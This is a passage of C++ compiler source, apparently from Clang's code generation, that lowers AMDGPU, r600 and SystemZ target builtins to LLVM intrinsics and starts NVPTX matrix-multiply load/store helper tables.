llvm::Value *Src1 = EmitScalarExpr(E->getArg(1));
llvm::Value *Src2 = EmitScalarExpr(E->getArg(2));
// FIXME-GFX10: How should 32 bit mask be handled?
Function *F = CGM.getIntrinsic(Intrinsic::amdgcn_icmp,
{ Builder.getInt64Ty(), Src0->getType() });
return Builder.CreateCall(F, { Src0, Src1, Src2 });
}
case AMDGPU::BI__builtin_amdgcn_fcmp:
case AMDGPU::BI__builtin_amdgcn_fcmpf: {
llvm::Value *Src0 = EmitScalarExpr(E->getArg(0));
llvm::Value *Src1 = EmitScalarExpr(E->getArg(1));
llvm::Value *Src2 = EmitScalarExpr(E->getArg(2));
// FIXME-GFX10: How should 32 bit mask be handled?
Function *F = CGM.getIntrinsic(Intrinsic::amdgcn_fcmp,
{ Builder.getInt64Ty(), Src0->getType() });
return Builder.CreateCall(F, { Src0, Src1, Src2 });
}
case AMDGPU::BI__builtin_amdgcn_class:
case AMDGPU::BI__builtin_amdgcn_classf:
case AMDGPU::BI__builtin_amdgcn_classh:
return emitFPIntBuiltin(*this, E, Intrinsic::amdgcn_class);
case AMDGPU::BI__builtin_amdgcn_fmed3f:
case AMDGPU::BI__builtin_amdgcn_fmed3h:
return emitTernaryBuiltin(*this, E, Intrinsic::amdgcn_fmed3);
case AMDGPU::BI__builtin_amdgcn_ds_append:
case AMDGPU::BI__builtin_amdgcn_ds_consume: {
Intrinsic::ID Intrin = BuiltinID == AMDGPU::BI__builtin_amdgcn_ds_append ?
Intrinsic::amdgcn_ds_append : Intrinsic::amdgcn_ds_consume;
Value *Src0 = EmitScalarExpr(E->getArg(0));
Function *F = CGM.getIntrinsic(Intrin, { Src0->getType() });
return Builder.CreateCall(F, { Src0, Builder.getFalse() });
}
case AMDGPU::BI__builtin_amdgcn_ds_faddf:
case AMDGPU::BI__builtin_amdgcn_ds_fminf:
case AMDGPU::BI__builtin_amdgcn_ds_fmaxf: {
Intrinsic::ID Intrin;
switch (BuiltinID) {
case AMDGPU::BI__builtin_amdgcn_ds_faddf:
Intrin = Intrinsic::amdgcn_ds_fadd;
break;
case AMDGPU::BI__builtin_amdgcn_ds_fminf:
Intrin = Intrinsic::amdgcn_ds_fmin;
break;
case AMDGPU::BI__builtin_amdgcn_ds_fmaxf:
Intrin = Intrinsic::amdgcn_ds_fmax;
break;
}
llvm::Value *Src0 = EmitScalarExpr(E->getArg(0));
llvm::Value *Src1 = EmitScalarExpr(E->getArg(1));
llvm::Value *Src2 = EmitScalarExpr(E->getArg(2));
llvm::Value *Src3 = EmitScalarExpr(E->getArg(3));
llvm::Value *Src4 = EmitScalarExpr(E->getArg(4));
llvm::Function *F = CGM.getIntrinsic(Intrin, { Src1->getType() });
llvm::FunctionType *FTy = F->getFunctionType();
llvm::Type *PTy = FTy->getParamType(0);
Src0 = Builder.CreatePointerBitCastOrAddrSpaceCast(Src0, PTy);
return Builder.CreateCall(F, { Src0, Src1, Src2, Src3, Src4 });
}
case AMDGPU::BI__builtin_amdgcn_global_atomic_fadd_f64:
case AMDGPU::BI__builtin_amdgcn_global_atomic_fadd_f32:
case AMDGPU::BI__builtin_amdgcn_global_atomic_fadd_v2f16:
case AMDGPU::BI__builtin_amdgcn_global_atomic_fmin_f64:
case AMDGPU::BI__builtin_amdgcn_global_atomic_fmax_f64:
case AMDGPU::BI__builtin_amdgcn_flat_atomic_fadd_f64:
case AMDGPU::BI__builtin_amdgcn_flat_atomic_fmin_f64:
case AMDGPU::BI__builtin_amdgcn_flat_atomic_fmax_f64: {
Intrinsic::ID IID;
llvm::Type *ArgTy = llvm::Type::getDoubleTy(getLLVMContext());
switch (BuiltinID) {
case AMDGPU::BI__builtin_amdgcn_global_atomic_fadd_f32:
ArgTy = llvm::Type::getFloatTy(getLLVMContext());
IID = Intrinsic::amdgcn_global_atomic_fadd;
break;
case AMDGPU::BI__builtin_amdgcn_global_atomic_fadd_v2f16:
ArgTy = llvm::FixedVectorType::get(
llvm::Type::getHalfTy(getLLVMContext()), 2);
IID = Intrinsic::amdgcn_global_atomic_fadd;
break;
case AMDGPU::BI__builtin_amdgcn_global_atomic_fadd_f64:
IID = Intrinsic::amdgcn_global_atomic_fadd;
break;
case AMDGPU::BI__builtin_amdgcn_global_atomic_fmin_f64:
IID = Intrinsic::amdgcn_global_atomic_fmin;
break;
case AMDGPU::BI__builtin_amdgcn_global_atomic_fmax_f64:
IID = Intrinsic::amdgcn_global_atomic_fmax;
break;
case AMDGPU::BI__builtin_amdgcn_flat_atomic_fadd_f64:
IID = Intrinsic::amdgcn_flat_atomic_fadd;
break;
case AMDGPU::BI__builtin_amdgcn_flat_atomic_fmin_f64:
IID = Intrinsic::amdgcn_flat_atomic_fmin;
break;
case AMDGPU::BI__builtin_amdgcn_flat_atomic_fmax_f64:
IID = Intrinsic::amdgcn_flat_atomic_fmax;
break;
}
llvm::Value *Addr = EmitScalarExpr(E->getArg(0));
llvm::Value *Val = EmitScalarExpr(E->getArg(1));
llvm::Function *F =
CGM.getIntrinsic(IID, {ArgTy, Addr->getType(), Val->getType()});
return Builder.CreateCall(F, {Addr, Val});
}
case AMDGPU::BI__builtin_amdgcn_ds_atomic_fadd_f64:
case AMDGPU::BI__builtin_amdgcn_ds_atomic_fadd_f32: {
Intrinsic::ID IID;
llvm::Type *ArgTy;
switch (BuiltinID) {
case AMDGPU::BI__builtin_amdgcn_ds_atomic_fadd_f32:
ArgTy = llvm::Type::getFloatTy(getLLVMContext());
IID = Intrinsic::amdgcn_ds_fadd;
break;
case AMDGPU::BI__builtin_amdgcn_ds_atomic_fadd_f64:
ArgTy = llvm::Type::getDoubleTy(getLLVMContext());
IID = Intrinsic::amdgcn_ds_fadd;
break;
}
llvm::Value *Addr = EmitScalarExpr(E->getArg(0));
llvm::Value *Val = EmitScalarExpr(E->getArg(1));
llvm::Constant *ZeroI32 = llvm::ConstantInt::getIntegerValue(
llvm::Type::getInt32Ty(getLLVMContext()), APInt(32, 0, true));
llvm::Constant *ZeroI1 = llvm::ConstantInt::getIntegerValue(
llvm::Type::getInt1Ty(getLLVMContext()), APInt(1, 0));
llvm::Function *F = CGM.getIntrinsic(IID, {ArgTy});
return Builder.CreateCall(F, {Addr, Val, ZeroI32, ZeroI32, ZeroI1});
}
case AMDGPU::BI__builtin_amdgcn_read_exec: {
CallInst *CI = cast<CallInst>(
EmitSpecialRegisterBuiltin(*this, E, Int64Ty, Int64Ty, NormalRead, "exec"));
CI->setConvergent();
return CI;
}
case AMDGPU::BI__builtin_amdgcn_read_exec_lo:
case AMDGPU::BI__builtin_amdgcn_read_exec_hi: {
StringRef RegName = BuiltinID == AMDGPU::BI__builtin_amdgcn_read_exec_lo ?
"exec_lo" : "exec_hi";
CallInst *CI = cast<CallInst>(
EmitSpecialRegisterBuiltin(*this, E, Int32Ty, Int32Ty, NormalRead, RegName));
CI->setConvergent();
return CI;
}
case AMDGPU::BI__builtin_amdgcn_image_bvh_intersect_ray:
case AMDGPU::BI__builtin_amdgcn_image_bvh_intersect_ray_h:
case AMDGPU::BI__builtin_amdgcn_image_bvh_intersect_ray_l:
case AMDGPU::BI__builtin_amdgcn_image_bvh_intersect_ray_lh: {
llvm::Value *NodePtr = EmitScalarExpr(E->getArg(0));
llvm::Value *RayExtent = EmitScalarExpr(E->getArg(1));
llvm::Value *RayOrigin = EmitScalarExpr(E->getArg(2));
llvm::Value *RayDir = EmitScalarExpr(E->getArg(3));
llvm::Value *RayInverseDir = EmitScalarExpr(E->getArg(4));
llvm::Value *TextureDescr = EmitScalarExpr(E->getArg(5));
// The builtins take these arguments as vec4 where the last element is
// ignored. The intrinsic takes them as vec3.
RayOrigin = Builder.CreateShuffleVector(RayOrigin, RayOrigin,
ArrayRef<int>{0, 1, 2});
RayDir =
Builder.CreateShuffleVector(RayDir, RayDir, ArrayRef<int>{0, 1, 2});
RayInverseDir = Builder.CreateShuffleVector(RayInverseDir, RayInverseDir,
ArrayRef<int>{0, 1, 2});
Function *F = CGM.getIntrinsic(Intrinsic::amdgcn_image_bvh_intersect_ray,
{NodePtr->getType(), RayDir->getType()});
return Builder.CreateCall(F, {NodePtr, RayExtent, RayOrigin, RayDir,
RayInverseDir, TextureDescr});
}
// amdgcn workitem
case AMDGPU::BI__builtin_amdgcn_workitem_id_x:
return emitRangedBuiltin(*this, Intrinsic::amdgcn_workitem_id_x, 0, 1024);
case AMDGPU::BI__builtin_amdgcn_workitem_id_y:
return emitRangedBuiltin(*this, Intrinsic::amdgcn_workitem_id_y, 0, 1024);
case AMDGPU::BI__builtin_amdgcn_workitem_id_z:
return emitRangedBuiltin(*this, Intrinsic::amdgcn_workitem_id_z, 0, 1024);
// amdgcn workgroup size
case AMDGPU::BI__builtin_amdgcn_workgroup_size_x:
return EmitAMDGPUWorkGroupSize(*this, 0);
case AMDGPU::BI__builtin_amdgcn_workgroup_size_y:
return EmitAMDGPUWorkGroupSize(*this, 1);
case AMDGPU::BI__builtin_amdgcn_workgroup_size_z:
return EmitAMDGPUWorkGroupSize(*this, 2);
// amdgcn grid size
case AMDGPU::BI__builtin_amdgcn_grid_size_x:
return EmitAMDGPUGridSize(*this, 0);
case AMDGPU::BI__builtin_amdgcn_grid_size_y:
return EmitAMDGPUGridSize(*this, 1);
case AMDGPU::BI__builtin_amdgcn_grid_size_z:
return EmitAMDGPUGridSize(*this, 2);
// r600 intrinsics
case AMDGPU::BI__builtin_r600_recipsqrt_ieee:
case AMDGPU::BI__builtin_r600_recipsqrt_ieeef:
return emitUnaryBuiltin(*this, E, Intrinsic::r600_recipsqrt_ieee);
case AMDGPU::BI__builtin_r600_read_tidig_x:
return emitRangedBuiltin(*this, Intrinsic::r600_read_tidig_x, 0, 1024);
case AMDGPU::BI__builtin_r600_read_tidig_y:
return emitRangedBuiltin(*this, Intrinsic::r600_read_tidig_y, 0, 1024);
case AMDGPU::BI__builtin_r600_read_tidig_z:
return emitRangedBuiltin(*this, Intrinsic::r600_read_tidig_z, 0, 1024);
case AMDGPU::BI__builtin_amdgcn_alignbit: {
llvm::Value *Src0 = EmitScalarExpr(E->getArg(0));
llvm::Value *Src1 = EmitScalarExpr(E->getArg(1));
llvm::Value *Src2 = EmitScalarExpr(E->getArg(2));
Function *F = CGM.getIntrinsic(Intrinsic::fshr, Src0->getType());
return Builder.CreateCall(F, { Src0, Src1, Src2 });
}
case AMDGPU::BI__builtin_amdgcn_fence: {
if (ProcessOrderScopeAMDGCN(EmitScalarExpr(E->getArg(0)),
EmitScalarExpr(E->getArg(1)), AO, SSID))
return Builder.CreateFence(AO, SSID);
LLVM_FALLTHROUGH;
}
case AMDGPU::BI__builtin_amdgcn_atomic_inc32:
case AMDGPU::BI__builtin_amdgcn_atomic_inc64:
case AMDGPU::BI__builtin_amdgcn_atomic_dec32:
case AMDGPU::BI__builtin_amdgcn_atomic_dec64: {
unsigned BuiltinAtomicOp;
llvm::Type *ResultType = ConvertType(E->getType());
switch (BuiltinID) {
case AMDGPU::BI__builtin_amdgcn_atomic_inc32:
case AMDGPU::BI__builtin_amdgcn_atomic_inc64:
BuiltinAtomicOp = Intrinsic::amdgcn_atomic_inc;
break;
case AMDGPU::BI__builtin_amdgcn_atomic_dec32:
case AMDGPU::BI__builtin_amdgcn_atomic_dec64:
BuiltinAtomicOp = Intrinsic::amdgcn_atomic_dec;
break;
}
Value *Ptr = EmitScalarExpr(E->getArg(0));
Value *Val = EmitScalarExpr(E->getArg(1));
llvm::Function *F =
CGM.getIntrinsic(BuiltinAtomicOp, {ResultType, Ptr->getType()});
if (ProcessOrderScopeAMDGCN(EmitScalarExpr(E->getArg(2)),
EmitScalarExpr(E->getArg(3)), AO, SSID)) {
// llvm.amdgcn.atomic.inc and llvm.amdgcn.atomic.dec expects ordering and
// scope as unsigned values
Value *MemOrder = Builder.getInt32(static_cast<int>(AO));
Value *MemScope = Builder.getInt32(static_cast<int>(SSID));
QualType PtrTy = E->getArg(0)->IgnoreImpCasts()->getType();
bool Volatile =
PtrTy->castAs<PointerType>()->getPointeeType().isVolatileQualified();
Value *IsVolatile = Builder.getInt1(static_cast<bool>(Volatile));
return Builder.CreateCall(F, {Ptr, Val, MemOrder, MemScope, IsVolatile});
}
LLVM_FALLTHROUGH;
}
default:
return nullptr;
}
}
/// Handle a SystemZ function in which the final argument is a pointer
/// to an int that receives the post-instruction CC value. At the LLVM level
/// this is represented as a function that returns a {result, cc} pair.
static Value *EmitSystemZIntrinsicWithCC(CodeGenFunction &CGF,
unsigned IntrinsicID,
const CallExpr *E) {
unsigned NumArgs = E->getNumArgs() - 1;
SmallVector<Value *, 8> Args(NumArgs);
for (unsigned I = 0; I < NumArgs; ++I)
Args[I] = CGF.EmitScalarExpr(E->getArg(I));
Address CCPtr = CGF.EmitPointerWithAlignment(E->getArg(NumArgs));
Function *F = CGF.CGM.getIntrinsic(IntrinsicID);
Value *Call = CGF.Builder.CreateCall(F, Args);
Value *CC = CGF.Builder.CreateExtractValue(Call, 1);
CGF.Builder.CreateStore(CC, CCPtr);
return CGF.Builder.CreateExtractValue(Call, 0);
}
Value *CodeGenFunction::EmitSystemZBuiltinExpr(unsigned BuiltinID,
const CallExpr *E) {
switch (BuiltinID) {
case SystemZ::BI__builtin_tbegin: {
Value *TDB = EmitScalarExpr(E->getArg(0));
Value *Control = llvm::ConstantInt::get(Int32Ty, 0xff0c);
Function *F = CGM.getIntrinsic(Intrinsic::s390_tbegin);
return Builder.CreateCall(F, {TDB, Control});
}
case SystemZ::BI__builtin_tbegin_nofloat: {
Value *TDB = EmitScalarExpr(E->getArg(0));
Value *Control = llvm::ConstantInt::get(Int32Ty, 0xff0c);
Function *F = CGM.getIntrinsic(Intrinsic::s390_tbegin_nofloat);
return Builder.CreateCall(F, {TDB, Control});
}
case SystemZ::BI__builtin_tbeginc: {
Value *TDB = llvm::ConstantPointerNull::get(Int8PtrTy);
Value *Control = llvm::ConstantInt::get(Int32Ty, 0xff08);
Function *F = CGM.getIntrinsic(Intrinsic::s390_tbeginc);
return Builder.CreateCall(F, {TDB, Control});
}
case SystemZ::BI__builtin_tabort: {
Value *Data = EmitScalarExpr(E->getArg(0));
Function *F = CGM.getIntrinsic(Intrinsic::s390_tabort);
return Builder.CreateCall(F, Builder.CreateSExt(Data, Int64Ty, "tabort"));
}
case SystemZ::BI__builtin_non_tx_store: {
Value *Address = EmitScalarExpr(E->getArg(0));
Value *Data = EmitScalarExpr(E->getArg(1));
Function *F = CGM.getIntrinsic(Intrinsic::s390_ntstg);
return Builder.CreateCall(F, {Data, Address});
}
// Vector builtins. Note that most vector builtins are mapped automatically
// to target-specific LLVM intrinsics. The ones handled specially here can
// be represented via standard LLVM IR, which is preferable to enable common
// LLVM optimizations.
case SystemZ::BI__builtin_s390_vpopctb:
case SystemZ::BI__builtin_s390_vpopcth:
case SystemZ::BI__builtin_s390_vpopctf:
case SystemZ::BI__builtin_s390_vpopctg: {
llvm::Type *ResultType = ConvertType(E->getType());
Value *X = EmitScalarExpr(E->getArg(0));
Function *F = CGM.getIntrinsic(Intrinsic::ctpop, ResultType);
return Builder.CreateCall(F, X);
}
case SystemZ::BI__builtin_s390_vclzb:
case SystemZ::BI__builtin_s390_vclzh:
case SystemZ::BI__builtin_s390_vclzf:
case SystemZ::BI__builtin_s390_vclzg: {
llvm::Type *ResultType = ConvertType(E->getType());
Value *X = EmitScalarExpr(E->getArg(0));
Value *Undef = ConstantInt::get(Builder.getInt1Ty(), false);
Function *F = CGM.getIntrinsic(Intrinsic::ctlz, ResultType);
return Builder.CreateCall(F, {X, Undef});
}
case SystemZ::BI__builtin_s390_vctzb:
case SystemZ::BI__builtin_s390_vctzh:
case SystemZ::BI__builtin_s390_vctzf:
case SystemZ::BI__builtin_s390_vctzg: {
llvm::Type *ResultType = ConvertType(E->getType());
Value *X = EmitScalarExpr(E->getArg(0));
Value *Undef = ConstantInt::get(Builder.getInt1Ty(), false);
Function *F = CGM.getIntrinsic(Intrinsic::cttz, ResultType);
return Builder.CreateCall(F, {X, Undef});
}
case SystemZ::BI__builtin_s390_vfsqsb:
case SystemZ::BI__builtin_s390_vfsqdb: {
llvm::Type *ResultType = ConvertType(E->getType());
Value *X = EmitScalarExpr(E->getArg(0));
if (Builder.getIsFPConstrained()) {
Function *F = CGM.getIntrinsic(Intrinsic::experimental_constrained_sqrt, ResultType);
return Builder.CreateConstrainedFPCall(F, { X });
} else {
Function *F = CGM.getIntrinsic(Intrinsic::sqrt, ResultType);
return Builder.CreateCall(F, X);
}
}
case SystemZ::BI__builtin_s390_vfmasb:
case SystemZ::BI__builtin_s390_vfmadb: {
llvm::Type *ResultType = ConvertType(E->getType());
Value *X = EmitScalarExpr(E->getArg(0));
Value *Y = EmitScalarExpr(E->getArg(1));
Value *Z = EmitScalarExpr(E->getArg(2));
if (Builder.getIsFPConstrained()) {
Function *F = CGM.getIntrinsic(Intrinsic::experimental_constrained_fma, ResultType);
return Builder.CreateConstrainedFPCall(F, {X, Y, Z});
} else {
Function *F = CGM.getIntrinsic(Intrinsic::fma, ResultType);
return Builder.CreateCall(F, {X, Y, Z});
}
}
case SystemZ::BI__builtin_s390_vfmssb:
case SystemZ::BI__builtin_s390_vfmsdb: {
llvm::Type *ResultType = ConvertType(E->getType());
Value *X = EmitScalarExpr(E->getArg(0));
Value *Y = EmitScalarExpr(E->getArg(1));
Value *Z = EmitScalarExpr(E->getArg(2));
if (Builder.getIsFPConstrained()) {
Function *F = CGM.getIntrinsic(Intrinsic::experimental_constrained_fma, ResultType);
return Builder.CreateConstrainedFPCall(F, {X, Y, Builder.CreateFNeg(Z, "neg")});
} else {
Function *F = CGM.getIntrinsic(Intrinsic::fma, ResultType);
return Builder.CreateCall(F, {X, Y, Builder.CreateFNeg(Z, "neg")});
}
}
case SystemZ::BI__builtin_s390_vfnmasb:
case SystemZ::BI__builtin_s390_vfnmadb: {
llvm::Type *ResultType = ConvertType(E->getType());
Value *X = EmitScalarExpr(E->getArg(0));
Value *Y = EmitScalarExpr(E->getArg(1));
Value *Z = EmitScalarExpr(E->getArg(2));
if (Builder.getIsFPConstrained()) {
Function *F = CGM.getIntrinsic(Intrinsic::experimental_constrained_fma, ResultType);
return Builder.CreateFNeg(Builder.CreateConstrainedFPCall(F, {X, Y, Z}), "neg");
} else {
Function *F = CGM.getIntrinsic(Intrinsic::fma, ResultType);
return Builder.CreateFNeg(Builder.CreateCall(F, {X, Y, Z}), "neg");
}
}
case SystemZ::BI__builtin_s390_vfnmssb:
case SystemZ::BI__builtin_s390_vfnmsdb: {
llvm::Type *ResultType = ConvertType(E->getType());
Value *X = EmitScalarExpr(E->getArg(0));
Value *Y = EmitScalarExpr(E->getArg(1));
Value *Z = EmitScalarExpr(E->getArg(2));
if (Builder.getIsFPConstrained()) {
Function *F = CGM.getIntrinsic(Intrinsic::experimental_constrained_fma, ResultType);
Value *NegZ = Builder.CreateFNeg(Z, "sub");
return Builder.CreateFNeg(Builder.CreateConstrainedFPCall(F, {X, Y, NegZ}));
} else {
Function *F = CGM.getIntrinsic(Intrinsic::fma, ResultType);
Value *NegZ = Builder.CreateFNeg(Z, "neg");
return Builder.CreateFNeg(Builder.CreateCall(F, {X, Y, NegZ}));
}
}
case SystemZ::BI__builtin_s390_vflpsb:
case SystemZ::BI__builtin_s390_vflpdb: {
llvm::Type *ResultType = ConvertType(E->getType());
Value *X = EmitScalarExpr(E->getArg(0));
Function *F = CGM.getIntrinsic(Intrinsic::fabs, ResultType);
return Builder.CreateCall(F, X);
}
case SystemZ::BI__builtin_s390_vflnsb:
case SystemZ::BI__builtin_s390_vflndb: {
llvm::Type *ResultType = ConvertType(E->getType());
Value *X = EmitScalarExpr(E->getArg(0));
Function *F = CGM.getIntrinsic(Intrinsic::fabs, ResultType);
return Builder.CreateFNeg(Builder.CreateCall(F, X), "neg");
}
case SystemZ::BI__builtin_s390_vfisb:
case SystemZ::BI__builtin_s390_vfidb: {
llvm::Type *ResultType = ConvertType(E->getType());
Value *X = EmitScalarExpr(E->getArg(0));
// Constant-fold the M4 and M5 mask arguments.
llvm::APSInt M4 = *E->getArg(1)->getIntegerConstantExpr(getContext());
llvm::APSInt M5 = *E->getArg(2)->getIntegerConstantExpr(getContext());
// Check whether this instance can be represented via a LLVM standard
// intrinsic. We only support some combinations of M4 and M5.
Intrinsic::ID ID = Intrinsic::not_intrinsic;
Intrinsic::ID CI;
switch (M4.getZExtValue()) {
default: break;
case 0: // IEEE-inexact exception allowed
switch (M5.getZExtValue()) {
default: break;
case 0: ID = Intrinsic::rint;
CI = Intrinsic::experimental_constrained_rint; break;
}
break;
case 4: // IEEE-inexact exception suppressed
switch (M5.getZExtValue()) {
default: break;
case 0: ID = Intrinsic::nearbyint;
CI = Intrinsic::experimental_constrained_nearbyint; break;
case 1: ID = Intrinsic::round;
CI = Intrinsic::experimental_constrained_round; break;
case 5: ID = Intrinsic::trunc;
CI = Intrinsic::experimental_constrained_trunc; break;
case 6: ID = Intrinsic::ceil;
CI = Intrinsic::experimental_constrained_ceil; break;
case 7: ID = Intrinsic::floor;
CI = Intrinsic::experimental_constrained_floor; break;
}
break;
}
if (ID != Intrinsic::not_intrinsic) {
if (Builder.getIsFPConstrained()) {
Function *F = CGM.getIntrinsic(CI, ResultType);
return Builder.CreateConstrainedFPCall(F, X);
} else {
Function *F = CGM.getIntrinsic(ID, ResultType);
return Builder.CreateCall(F, X);
}
}
switch (BuiltinID) { // FIXME: constrained version?
case SystemZ::BI__builtin_s390_vfisb: ID = Intrinsic::s390_vfisb; break;
case SystemZ::BI__builtin_s390_vfidb: ID = Intrinsic::s390_vfidb; break;
default: llvm_unreachable("Unknown BuiltinID");
}
Function *F = CGM.getIntrinsic(ID);
Value *M4Value = llvm::ConstantInt::get(getLLVMContext(), M4);
Value *M5Value = llvm::ConstantInt::get(getLLVMContext(), M5);
return Builder.CreateCall(F, {X, M4Value, M5Value});
}
case SystemZ::BI__builtin_s390_vfmaxsb:
case SystemZ::BI__builtin_s390_vfmaxdb: {
llvm::Type *ResultType = ConvertType(E->getType());
Value *X = EmitScalarExpr(E->getArg(0));
Value *Y = EmitScalarExpr(E->getArg(1));
// Constant-fold the M4 mask argument.
llvm::APSInt M4 = *E->getArg(2)->getIntegerConstantExpr(getContext());
// Check whether this instance can be represented via a LLVM standard
// intrinsic. We only support some values of M4.
Intrinsic::ID ID = Intrinsic::not_intrinsic;
Intrinsic::ID CI;
switch (M4.getZExtValue()) {
default: break;
case 4: ID = Intrinsic::maxnum;
CI = Intrinsic::experimental_constrained_maxnum; break;
}
if (ID != Intrinsic::not_intrinsic) {
if (Builder.getIsFPConstrained()) {
Function *F = CGM.getIntrinsic(CI, ResultType);
return Builder.CreateConstrainedFPCall(F, {X, Y});
} else {
Function *F = CGM.getIntrinsic(ID, ResultType);
return Builder.CreateCall(F, {X, Y});
}
}
switch (BuiltinID) {
case SystemZ::BI__builtin_s390_vfmaxsb: ID = Intrinsic::s390_vfmaxsb; break;
case SystemZ::BI__builtin_s390_vfmaxdb: ID = Intrinsic::s390_vfmaxdb; break;
default: llvm_unreachable("Unknown BuiltinID");
}
Function *F = CGM.getIntrinsic(ID);
Value *M4Value = llvm::ConstantInt::get(getLLVMContext(), M4);
return Builder.CreateCall(F, {X, Y, M4Value});
}
case SystemZ::BI__builtin_s390_vfminsb:
case SystemZ::BI__builtin_s390_vfmindb: {
llvm::Type *ResultType = ConvertType(E->getType());
Value *X = EmitScalarExpr(E->getArg(0));
Value *Y = EmitScalarExpr(E->getArg(1));
// Constant-fold the M4 mask argument.
llvm::APSInt M4 = *E->getArg(2)->getIntegerConstantExpr(getContext());
// Check whether this instance can be represented via a LLVM standard
// intrinsic. We only support some values of M4.
Intrinsic::ID ID = Intrinsic::not_intrinsic;
Intrinsic::ID CI;
switch (M4.getZExtValue()) {
default: break;
case 4: ID = Intrinsic::minnum;
CI = Intrinsic::experimental_constrained_minnum; break;
}
if (ID != Intrinsic::not_intrinsic) {
if (Builder.getIsFPConstrained()) {
Function *F = CGM.getIntrinsic(CI, ResultType);
return Builder.CreateConstrainedFPCall(F, {X, Y});
} else {
Function *F = CGM.getIntrinsic(ID, ResultType);
return Builder.CreateCall(F, {X, Y});
}
}
switch (BuiltinID) {
case SystemZ::BI__builtin_s390_vfminsb: ID = Intrinsic::s390_vfminsb; break;
case SystemZ::BI__builtin_s390_vfmindb: ID = Intrinsic::s390_vfmindb; break;
default: llvm_unreachable("Unknown BuiltinID");
}
Function *F = CGM.getIntrinsic(ID);
Value *M4Value = llvm::ConstantInt::get(getLLVMContext(), M4);
return Builder.CreateCall(F, {X, Y, M4Value});
}
case SystemZ::BI__builtin_s390_vlbrh:
case SystemZ::BI__builtin_s390_vlbrf:
case SystemZ::BI__builtin_s390_vlbrg: {
llvm::Type *ResultType = ConvertType(E->getType());
Value *X = EmitScalarExpr(E->getArg(0));
Function *F = CGM.getIntrinsic(Intrinsic::bswap, ResultType);
return Builder.CreateCall(F, X);
}
// Vector intrinsics that output the post-instruction CC value.
#define INTRINSIC_WITH_CC(NAME) \
case SystemZ::BI__builtin_##NAME: \
return EmitSystemZIntrinsicWithCC(*this, Intrinsic::NAME, E)
INTRINSIC_WITH_CC(s390_vpkshs);
INTRINSIC_WITH_CC(s390_vpksfs);
INTRINSIC_WITH_CC(s390_vpksgs);
INTRINSIC_WITH_CC(s390_vpklshs);
INTRINSIC_WITH_CC(s390_vpklsfs);
INTRINSIC_WITH_CC(s390_vpklsgs);
INTRINSIC_WITH_CC(s390_vceqbs);
INTRINSIC_WITH_CC(s390_vceqhs);
INTRINSIC_WITH_CC(s390_vceqfs);
INTRINSIC_WITH_CC(s390_vceqgs);
INTRINSIC_WITH_CC(s390_vchbs);
INTRINSIC_WITH_CC(s390_vchhs);
INTRINSIC_WITH_CC(s390_vchfs);
INTRINSIC_WITH_CC(s390_vchgs);
INTRINSIC_WITH_CC(s390_vchlbs);
INTRINSIC_WITH_CC(s390_vchlhs);
INTRINSIC_WITH_CC(s390_vchlfs);
INTRINSIC_WITH_CC(s390_vchlgs);
INTRINSIC_WITH_CC(s390_vfaebs);
INTRINSIC_WITH_CC(s390_vfaehs);
INTRINSIC_WITH_CC(s390_vfaefs);
INTRINSIC_WITH_CC(s390_vfaezbs);
INTRINSIC_WITH_CC(s390_vfaezhs);
INTRINSIC_WITH_CC(s390_vfaezfs);
INTRINSIC_WITH_CC(s390_vfeebs);
INTRINSIC_WITH_CC(s390_vfeehs);
INTRINSIC_WITH_CC(s390_vfeefs);
INTRINSIC_WITH_CC(s390_vfeezbs);
INTRINSIC_WITH_CC(s390_vfeezhs);
INTRINSIC_WITH_CC(s390_vfeezfs);
INTRINSIC_WITH_CC(s390_vfenebs);
INTRINSIC_WITH_CC(s390_vfenehs);
INTRINSIC_WITH_CC(s390_vfenefs);
INTRINSIC_WITH_CC(s390_vfenezbs);
INTRINSIC_WITH_CC(s390_vfenezhs);
INTRINSIC_WITH_CC(s390_vfenezfs);
INTRINSIC_WITH_CC(s390_vistrbs);
INTRINSIC_WITH_CC(s390_vistrhs);
INTRINSIC_WITH_CC(s390_vistrfs);
INTRINSIC_WITH_CC(s390_vstrcbs);
INTRINSIC_WITH_CC(s390_vstrchs);
INTRINSIC_WITH_CC(s390_vstrcfs);
INTRINSIC_WITH_CC(s390_vstrczbs);
INTRINSIC_WITH_CC(s390_vstrczhs);
INTRINSIC_WITH_CC(s390_vstrczfs);
INTRINSIC_WITH_CC(s390_vfcesbs);
INTRINSIC_WITH_CC(s390_vfcedbs);
INTRINSIC_WITH_CC(s390_vfchsbs);
INTRINSIC_WITH_CC(s390_vfchdbs);
INTRINSIC_WITH_CC(s390_vfchesbs);
INTRINSIC_WITH_CC(s390_vfchedbs);
INTRINSIC_WITH_CC(s390_vftcisb);
INTRINSIC_WITH_CC(s390_vftcidb);
INTRINSIC_WITH_CC(s390_vstrsb);
INTRINSIC_WITH_CC(s390_vstrsh);
INTRINSIC_WITH_CC(s390_vstrsf);
INTRINSIC_WITH_CC(s390_vstrszb);
INTRINSIC_WITH_CC(s390_vstrszh);
INTRINSIC_WITH_CC(s390_vstrszf);
#undef INTRINSIC_WITH_CC
default:
return nullptr;
}
}
namespace {
// Helper classes for mapping MMA builtins to particular LLVM intrinsic variant.
struct NVPTXMmaLdstInfo {
unsigned NumResults; // Number of elements to load/store
// Intrinsic IDs for row/col variants. 0 if particular layout is unsupported.
unsigned IID_col;
unsigned IID_row;
};
#define MMA_INTR(geom_op_type, layout) \
Intrinsic::nvvm_wmma_##geom_op_type##_##layout##_stride
#define MMA_LDST(n, geom_op_type) \
{ n, MMA_INTR(geom_op_type, col), MMA_INTR(geom_op_type, row) }
static NVPTXMmaLdstInfo getNVPTXMmaLdstInfo(unsigned BuiltinID) {
switch (BuiltinID) {
// FP MMA loads
case NVPTX::BI__hmma_m16n16k16_ld_a:
return MMA_LDST(8, m16n16k16_load_a_f16);
case NVPTX::BI__hmma_m16n16k16_ld_b:
return MMA_LDST(8, m16n16k16_load_b_f16);
case NVPTX::BI__hmma_m16n16k16_ld_c_f16:
return MMA_LDST(4, m16n16k16_load_c_f16);
case NVPTX::BI__hmma_m16n16k16_ld_c_f32:
return MMA_LDST(8, m16n16k16_load_c_f32);
case NVPTX::BI__hmma_m32n8k16_ld_a:
return MMA_LDST(8, m32n8k16_load_a_f16);
case NVPTX::BI__hmma_m32n8k16_ld_b:
return MMA_LDST(8, m32n8k16_load_b_f16);
case NVPTX::BI__hmma_m32n8k16_ld_c_f16:
return MMA_LDST(4, m32n8k16_load_c_f16);
case NVPTX::BI__hmma_m32n8k16_ld_c_f32:
return MMA_LDST(8, m32n8k16_load_c_f32);
case NVPTX::BI__hmma_m8n32k16_ld_a:
